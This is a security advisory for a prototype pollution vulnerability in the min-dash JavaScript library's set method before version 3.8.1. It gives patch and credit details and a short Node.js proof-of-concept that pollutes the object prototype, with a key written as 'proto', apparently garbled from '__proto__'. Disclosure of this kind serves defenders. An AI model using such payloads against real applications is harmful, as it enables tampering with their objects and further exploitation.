Prototype pollution in min-dash < 3.8.1
Impact The set method is vulnerable to prototype pollution with specially crafted inputs. // insert the following into poc.js and run node poc,js (after installing the package) let parser = require("min-dash"); parser.set({}, [["proto"], "polluted"], "success"); console.log(polluted); Patches min-dash>=3.8.1 fix the issue. Workarounds No workarounds exist for the issue. References Closed via https://github.com/bpmn-io/min-dash/pull/21. Credits Credits to Cristian-Alexandru STAICU who found the vulnerability and to Idan Digmi from the Snyk Security Team …